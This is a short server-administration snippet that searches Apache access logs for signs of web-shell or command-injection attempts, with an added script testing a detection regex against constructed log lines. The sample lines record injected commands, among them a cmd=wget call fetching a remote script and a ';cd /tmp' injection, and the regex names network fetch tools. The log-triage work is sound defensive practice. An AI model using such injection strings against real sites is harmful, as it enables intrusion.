find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;
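The domlog search above flags requests that carry a shell command name followed by an encoded space. The script below is an added example, not from the page: it runs that pattern over constructed Apache access-log lines, shows that the page's regex also fires on a harmless URL (the "sh%20" inside "flash%20guide"), and offers a tuned pattern that requires the keyword to start a parameter value; top_sources then counts hits per client IP.

```shell
#!/bin/sh
# Web-shell/RCE attempt triage over Apache access logs (added example).
# SAMPLE_DOMLOG is constructed; addresses are RFC 5737 documentation ranges.
SAMPLE_DOMLOG='198.51.100.7 - - [13/Jan/2012:10:01:02 +0000] "GET /cgi-bin/test.cgi?cmd=wget%20http://203.0.113.9/x.sh HTTP/1.1" 200 512 "-" "curl/7.19"
192.0.2.44 - - [13/Jan/2012:10:01:05 +0000] "GET /docs/flash%20guide.pdf HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jan/2012:10:01:09 +0000] "GET /index.php?page=;cd%20/tmp HTTP/1.1" 404 220 "-" "curl/7.19"
192.0.2.10 - - [13/Jan/2012:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"'

# The page's pattern, and a tuned one: keyword must follow =, ; or | and may be
# followed by either encoding of a space (%20 or +). This drops "flash%20guide".
PAGE_RE='(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20'
TUNED_RE='[=;|]+(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)(%20|\+)'

# scan_domlog <regex>: stdin = access log; stdout = "client_ip<TAB>request" per hit.
scan_domlog() {
  grep -Ei "$1" | awk -F'"' '{ split($1, a, " "); print a[1] "\t" $2 }'
}

# top_sources <regex>: hit count per client IP, busiest first ("ip count").
top_sources() {
  scan_domlog "$1" | cut -f1 | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}

# Stand-alone run against the constructed log.
echo "page pattern:";  printf '%s\n' "$SAMPLE_DOMLOG" | scan_domlog "$PAGE_RE"
echo "tuned pattern:"; printf '%s\n' "$SAMPLE_DOMLOG" | scan_domlog "$TUNED_RE"
echo "top sources:";   printf '%s\n' "$SAMPLE_DOMLOG" | top_sources "$TUNED_RE"
```

On a real server, feed the domlogs in with `cat /usr/local/apache/domlogs/* | top_sources "$TUNED_RE"`.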